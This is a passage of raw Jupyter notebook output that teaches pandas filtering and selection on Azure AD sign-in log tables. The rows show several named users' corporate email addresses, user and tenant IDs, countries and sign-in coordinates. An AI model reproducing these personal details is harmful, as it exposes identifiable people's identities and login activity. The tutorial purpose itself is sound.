2 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 11:36:15.896000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "974ea11a-7ed4-4cfd-b86b-d3d4b5bd547f | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | Arseny Vasilev | \n", "4 | \n", "RU | \n", "\n", " | Azure Portal | \n", "c44b4083-3bb0-49c1-b47d-974e53cbdf3c | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T11:36:15.8961297+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Service Management API | \n", "797f4846-ba00-4fd7-ba43-dac1f8f63013 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | \n", "Arseny Vasilev | \n", "9267d02c-5f76-40a9-a9eb-b686f3ca47aa | \n", "avasilev@viacode.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Guest | \n", "None | \n", "\n", " | \n", " | \n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "5fccd68a-e65e-46ae-96b1-2d896d680249 | \n", "SigninLogs | \n", "Sucess | \n", "59.93904113769531 | \n", "30.3157901763916 | \n", "
3 rows 69 columns
\n", "Data size:
" ], "text/plain": [ "DateFrame shape is 2136 rows x 69 columns
" ], "text/plain": [ "Display the first 2 rows using head():
" ], "text/plain": [ "\n", " | TenantId | \n", "SourceSystem | \n", "TimeGenerated | \n", "ResourceId | \n", "OperationName | \n", "OperationVersion | \n", "Category | \n", "ResultType | \n", "ResultSignature | \n", "ResultDescription | \n", "DurationMs | \n", "CorrelationId | \n", "Resource | \n", "ResourceGroup | \n", "ResourceProvider | \n", "Identity | \n", "Level | \n", "Location | \n", "AlternateSignInName | \n", "AppDisplayName | \n", "AppId | \n", "AuthenticationDetails | \n", "AuthenticationMethodsUsed | \n", "AuthenticationProcessingDetails | \n", "AuthenticationRequirement | \n", "... | \n", "RiskLevelDuringSignIn | \n", "RiskState | \n", "ResourceDisplayName | \n", "ResourceIdentity | \n", "ServicePrincipalId | \n", "ServicePrincipalName | \n", "Status | \n", "TokenIssuerName | \n", "TokenIssuerType | \n", "UserAgent | \n", "UserDisplayName | \n", "UserId | \n", "UserPrincipalName | \n", "AADTenantId | \n", "UserType | \n", "FlaggedForReview | \n", "IPAddressFromResourceProvider | \n", "SignInIdentifier | \n", "SignInIdentifierType | \n", "ResourceTenantId | \n", "HomeTenantId | \n", "Type | \n", "Result | \n", "Latitude | \n", "Longitude | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 10:55:21.648000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "9558f30b-a1db-4676-a586-7db608bdaa69 | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "4 | \n", "US | \n", "Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "Microsoft Azure Active Directory Connect | \n", "cb1056e2-e479-49de-ae31-7812af012ed8 | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T10:55:21.6485011+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Active Directory | \n", "00000002-0000-0000-c000-000000000000 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "2235a468-ad9c-4375-8008-0a7be76994a7 | \n", "sync_aadcon_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Member | \n", "None | \n", "\n", " | Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "\n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "SigninLogs | \n", "Sucess | \n", "38.73078155517578 | \n", "-78.17196655273438 | \n", "
1 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 10:55:26.252000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "dac1edbe-1985-4f78-8d20-f4725e28b865 | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "4 | \n", "US | \n", "Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "Microsoft Azure Active Directory Connect | \n", "cb1056e2-e479-49de-ae31-7812af012ed8 | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T10:55:26.2522747+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Active Directory | \n", "00000002-0000-0000-c000-000000000000 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "2235a468-ad9c-4375-8008-0a7be76994a7 | \n", "sync_aadcon_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Member | \n", "None | \n", "\n", " | Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "\n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "SigninLogs | \n", "Sucess | \n", "38.7130012512207 | \n", "-78.15899658203125 | \n", "
2 rows 69 columns
\n", "Display the 3rd row using iloc[]:
" ], "text/plain": [ "Show the column names in the DataFrame
" ], "text/plain": [ "Display just the TimeGenerated and TenantId columnns:
" ], "text/plain": [ "\n", " | TimeGenerated | \n", "TenantId | \n", "
---|---|---|
0 | \n", "2021-06-28 10:55:21.648000+00:00 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "
1 | \n", "2021-06-28 10:55:26.252000+00:00 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "
2 | \n", "2021-06-28 11:36:15.896000+00:00 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "
3 | \n", "2021-06-28 12:24:50.274000+00:00 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "
4 | \n", "2021-06-28 12:24:44.957000+00:00 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "
data[<boolean expression>]\n", "returns all rows in the dataframe where the boolean expression is True.
Display only rows where AppDisplayName value is 'Azure Portal':
" ], "text/plain": [ "\n", " | TenantId | \n", "SourceSystem | \n", "TimeGenerated | \n", "ResourceId | \n", "OperationName | \n", "OperationVersion | \n", "Category | \n", "ResultType | \n", "ResultSignature | \n", "ResultDescription | \n", "DurationMs | \n", "CorrelationId | \n", "Resource | \n", "ResourceGroup | \n", "ResourceProvider | \n", "Identity | \n", "Level | \n", "Location | \n", "AlternateSignInName | \n", "AppDisplayName | \n", "AppId | \n", "AuthenticationDetails | \n", "AuthenticationMethodsUsed | \n", "AuthenticationProcessingDetails | \n", "AuthenticationRequirement | \n", "... | \n", "RiskLevelDuringSignIn | \n", "RiskState | \n", "ResourceDisplayName | \n", "ResourceIdentity | \n", "ServicePrincipalId | \n", "ServicePrincipalName | \n", "Status | \n", "TokenIssuerName | \n", "TokenIssuerType | \n", "UserAgent | \n", "UserDisplayName | \n", "UserId | \n", "UserPrincipalName | \n", "AADTenantId | \n", "UserType | \n", "FlaggedForReview | \n", "IPAddressFromResourceProvider | \n", "SignInIdentifier | \n", "SignInIdentifierType | \n", "ResourceTenantId | \n", "HomeTenantId | \n", "Type | \n", "Result | \n", "Latitude | \n", "Longitude | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 11:36:15.896000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "974ea11a-7ed4-4cfd-b86b-d3d4b5bd547f | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | Arseny Vasilev | \n", "4 | \n", "RU | \n", "\n", " | Azure Portal | \n", "c44b4083-3bb0-49c1-b47d-974e53cbdf3c | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T11:36:15.8961297+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Service Management API | \n", "797f4846-ba00-4fd7-ba43-dac1f8f63013 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | \n", "Arseny Vasilev | \n", "9267d02c-5f76-40a9-a9eb-b686f3ca47aa | \n", "avasilev@viacode.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Guest | \n", "None | \n", "\n", " | \n", " | \n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "5fccd68a-e65e-46ae-96b1-2d896d680249 | \n", "SigninLogs | \n", "Sucess | \n", "59.93904113769531 | \n", "30.3157901763916 | \n", "
3 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 12:24:50.274000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "d1c11047-9e6d-4814-80fc-334c453582a3 | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | Koby Koren | \n", "4 | \n", "IL | \n", "\n", " | Azure Portal | \n", "c44b4083-3bb0-49c1-b47d-974e53cbdf3c | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T12:24:50.2743176+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"Login Hint Present\",\\r\\n \"value\": \"True\"\\r\\n },\\r\\n {\\r\\n \"key\":... | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Service Management API | \n", "797f4846-ba00-4fd7-ba43-dac1f8f63013 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | \n", "Koby Koren | \n", "da48f21e-2f91-4c6a-9d30-56fd10a24672 | \n", "kobyk@microsoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Guest | \n", "None | \n", "\n", " | \n", " | \n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "72f988bf-86f1-41af-91ab-2d7cd011db47 | \n", "SigninLogs | \n", "Sucess | \n", "32.16241073608399 | \n", "34.84468078613281 | \n", "
4 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 12:24:44.957000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "60855931-eec4-466c-a24e-ba630c087a3e | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | Koby Koren | \n", "4 | \n", "IL | \n", "\n", " | Azure Portal | \n", "c44b4083-3bb0-49c1-b47d-974e53cbdf3c | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T12:24:44.9579314+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"Login Hint Present\",\\r\\n \"value\": \"True\"\\r\\n },\\r\\n {\\r\\n \"key\":... | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Service Management API | \n", "797f4846-ba00-4fd7-ba43-dac1f8f63013 | \n", "\n", " | \n", " | {'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'} | \n", "\n", " | AzureAD | \n", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | \n", "Koby Koren | \n", "da48f21e-2f91-4c6a-9d30-56fd10a24672 | \n", "kobyk@microsoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Guest | \n", "None | \n", "\n", " | \n", " | \n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "72f988bf-86f1-41af-91ab-2d7cd011db47 | \n", "SigninLogs | \n", "Sucess | \n", "32.16241073608399 | \n", "34.84468078613281 | \n", "
5 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 12:24:40.501000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "9e5f0875-91cf-423f-8bbe-36c6f31bc5a5 | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | MAHE, Edouard | \n", "4 | \n", "FR | \n", "\n", " | Azure Portal | \n", "c44b4083-3bb0-49c1-b47d-974e53cbdf3c | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T12:24:40.5011019+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Service Management API | \n", "797f4846-ba00-4fd7-ba43-dac1f8f63013 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | \n", "MAHE, Edouard | \n", "36d6777f-e4a7-4d8b-ac7d-9db0cf1138b0 | \n", "edouard.mahe@sogeti.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Guest | \n", "None | \n", "\n", " | \n", " | \n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "76a2ae5a-9f00-4f6b-95ed-5d33d77c4d61 | \n", "SigninLogs | \n", "Sucess | \n", "48.79909896850586 | \n", "2.262470006942749 | \n", "
9 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 12:55:10.995000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "cff2d84e-8faf-4367-a551-b315ebd59aac | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | Miemiec, Emanuel | \n", "4 | \n", "PL | \n", "\n", " | Azure Portal | \n", "c44b4083-3bb0-49c1-b47d-974e53cbdf3c | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T12:55:10.9951954+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Service Management API | \n", "797f4846-ba00-4fd7-ba43-dac1f8f63013 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.443... | \n", "Miemiec, Emanuel | \n", "b112c84a-fe47-4428-b3af-14ea028e6bf7 | \n", "emanuel.miemiec@capgemini.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Guest | \n", "None | \n", "\n", " | \n", " | \n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "76a2ae5a-9f00-4f6b-95ed-5d33d77c4d61 | \n", "SigninLogs | \n", "Sucess | \n", "50.06748962402344 | \n", "18.64970016479492 | \n", "
5 rows 69 columns
\n", "Display rows where ClientAppUsed is either 'Browser' or 'Mobile Apps and Desktop clients':
" ], "text/plain": [ "\n", " | TenantId | \n", "SourceSystem | \n", "TimeGenerated | \n", "ResourceId | \n", "OperationName | \n", "OperationVersion | \n", "Category | \n", "ResultType | \n", "ResultSignature | \n", "ResultDescription | \n", "DurationMs | \n", "CorrelationId | \n", "Resource | \n", "ResourceGroup | \n", "ResourceProvider | \n", "Identity | \n", "Level | \n", "Location | \n", "AlternateSignInName | \n", "AppDisplayName | \n", "AppId | \n", "AuthenticationDetails | \n", "AuthenticationMethodsUsed | \n", "AuthenticationProcessingDetails | \n", "AuthenticationRequirement | \n", "... | \n", "RiskLevelDuringSignIn | \n", "RiskState | \n", "ResourceDisplayName | \n", "ResourceIdentity | \n", "ServicePrincipalId | \n", "ServicePrincipalName | \n", "Status | \n", "TokenIssuerName | \n", "TokenIssuerType | \n", "UserAgent | \n", "UserDisplayName | \n", "UserId | \n", "UserPrincipalName | \n", "AADTenantId | \n", "UserType | \n", "FlaggedForReview | \n", "IPAddressFromResourceProvider | \n", "SignInIdentifier | \n", "SignInIdentifierType | \n", "ResourceTenantId | \n", "HomeTenantId | \n", "Type | \n", "Result | \n", "Latitude | \n", "Longitude | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 10:55:21.648000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "9558f30b-a1db-4676-a586-7db608bdaa69 | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "4 | \n", "US | \n", "Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "Microsoft Azure Active Directory Connect | \n", "cb1056e2-e479-49de-ae31-7812af012ed8 | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T10:55:21.6485011+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Active Directory | \n", "00000002-0000-0000-c000-000000000000 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "2235a468-ad9c-4375-8008-0a7be76994a7 | \n", "sync_aadcon_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Member | \n", "None | \n", "\n", " | Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "\n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "SigninLogs | \n", "Sucess | \n", "38.73078155517578 | \n", "-78.17196655273438 | \n", "
1 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 10:55:26.252000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "dac1edbe-1985-4f78-8d20-f4725e28b865 | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "4 | \n", "US | \n", "Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "Microsoft Azure Active Directory Connect | \n", "cb1056e2-e479-49de-ae31-7812af012ed8 | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T10:55:26.2522747+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Active Directory | \n", "00000002-0000-0000-c000-000000000000 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "2235a468-ad9c-4375-8008-0a7be76994a7 | \n", "sync_aadcon_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Member | \n", "None | \n", "\n", " | Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "\n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "SigninLogs | \n", "Sucess | \n", "38.7130012512207 | \n", "-78.15899658203125 | \n", "
2 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 11:36:15.896000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "974ea11a-7ed4-4cfd-b86b-d3d4b5bd547f | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | Arseny Vasilev | \n", "4 | \n", "RU | \n", "\n", " | Azure Portal | \n", "c44b4083-3bb0-49c1-b47d-974e53cbdf3c | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T11:36:15.8961297+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Service Management API | \n", "797f4846-ba00-4fd7-ba43-dac1f8f63013 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | \n", "Arseny Vasilev | \n", "9267d02c-5f76-40a9-a9eb-b686f3ca47aa | \n", "avasilev@viacode.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Guest | \n", "None | \n", "\n", " | \n", " | \n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "5fccd68a-e65e-46ae-96b1-2d896d680249 | \n", "SigninLogs | \n", "Sucess | \n", "59.93904113769531 | \n", "30.3157901763916 | \n", "
3 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 12:24:50.274000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "d1c11047-9e6d-4814-80fc-334c453582a3 | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | Koby Koren | \n", "4 | \n", "IL | \n", "\n", " | Azure Portal | \n", "c44b4083-3bb0-49c1-b47d-974e53cbdf3c | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T12:24:50.2743176+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"Login Hint Present\",\\r\\n \"value\": \"True\"\\r\\n },\\r\\n {\\r\\n \"key\":... | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Service Management API | \n", "797f4846-ba00-4fd7-ba43-dac1f8f63013 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | \n", "Koby Koren | \n", "da48f21e-2f91-4c6a-9d30-56fd10a24672 | \n", "kobyk@microsoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Guest | \n", "None | \n", "\n", " | \n", " | \n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "72f988bf-86f1-41af-91ab-2d7cd011db47 | \n", "SigninLogs | \n", "Sucess | \n", "32.16241073608399 | \n", "34.84468078613281 | \n", "
4 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 12:24:44.957000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "60855931-eec4-466c-a24e-ba630c087a3e | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | Koby Koren | \n", "4 | \n", "IL | \n", "\n", " | Azure Portal | \n", "c44b4083-3bb0-49c1-b47d-974e53cbdf3c | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T12:24:44.9579314+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"Login Hint Present\",\\r\\n \"value\": \"True\"\\r\\n },\\r\\n {\\r\\n \"key\":... | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Service Management API | \n", "797f4846-ba00-4fd7-ba43-dac1f8f63013 | \n", "\n", " | \n", " | {'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'} | \n", "\n", " | AzureAD | \n", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | \n", "Koby Koren | \n", "da48f21e-2f91-4c6a-9d30-56fd10a24672 | \n", "kobyk@microsoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Guest | \n", "None | \n", "\n", " | \n", " | \n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "72f988bf-86f1-41af-91ab-2d7cd011db47 | \n", "SigninLogs | \n", "Sucess | \n", "32.16241073608399 | \n", "34.84468078613281 | \n", "
5 rows 69 columns
\n", "\n", " | TenantId | \n", "SourceSystem | \n", "TimeGenerated | \n", "ResourceId | \n", "OperationName | \n", "OperationVersion | \n", "Category | \n", "ResultType | \n", "ResultSignature | \n", "ResultDescription | \n", "DurationMs | \n", "CorrelationId | \n", "Resource | \n", "ResourceGroup | \n", "ResourceProvider | \n", "Identity | \n", "Level | \n", "Location | \n", "AlternateSignInName | \n", "AppId | \n", "AuthenticationDetails | \n", "AuthenticationMethodsUsed | \n", "AuthenticationProcessingDetails | \n", "AuthenticationRequirement | \n", "AuthenticationRequirementPolicies | \n", "... | \n", "RiskLevelDuringSignIn | \n", "RiskState | \n", "ResourceDisplayName | \n", "ResourceIdentity | \n", "ServicePrincipalId | \n", "ServicePrincipalName | \n", "Status | \n", "TokenIssuerName | \n", "TokenIssuerType | \n", "UserAgent | \n", "UserDisplayName | \n", "UserId | \n", "UserPrincipalName | \n", "AADTenantId | \n", 